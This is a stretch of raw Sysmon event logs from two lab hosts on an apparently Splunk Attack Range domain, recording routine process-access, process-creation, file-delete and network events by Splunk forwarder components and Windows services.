07:43:25.479{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:25.463{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.463{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.463{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.464{0C1E0330-F29D-60EB-3679-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000805921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.237{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57145-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.229{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853A9E479F94D2F15BCD545D107F415E,SHA256=807CD0B0669848ACB461DF0D61CF2EA5BD641700D31EC409056C8BA8DDB4F8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.229{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D10A039549DB5572CD996CEE013BB6A,SHA256=F0AFD45C5CA697C374081226297853BBBB81A51E14F8D00EBBB78A517AC9C972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:25.166{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FD39E386651AFF99A05F50F2E06524,SHA256=99E951460C54D10C7E4D3F35CA4B3098BF876A6DA149E12FD8A15A00FF1B190A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:17.751{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50892-false10.0.1.12-8000- 23542300x80000000000000001045753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:26.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEBD21522E0F64414B46DCB72A330F2,SHA256=FCA390D9721FAF4EA886494A39BB1F20720D84A45FEDE169F3B0ADE65357EAB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.947{0C1E0330-F29E-60EB-3879-00000000D001}24003928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.822{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.807{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.807{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.808{0C1E0330-F29E-60EB-3879-00000000D001}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.698{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853A9E479F94D2F15BCD545D107F415E,SHA256=807CD0B0669848ACB461DF0D61CF2EA5BD641700D31EC409056C8BA8DDB4F8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.448{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63EE9F5BB659AEB05FD790CA92B847BE,SHA256=8CA827F26995D4666E830934781F5575369F10D3EFAE05E29425D1189220C651,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:18.694{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53243-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x8000000000000000805948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 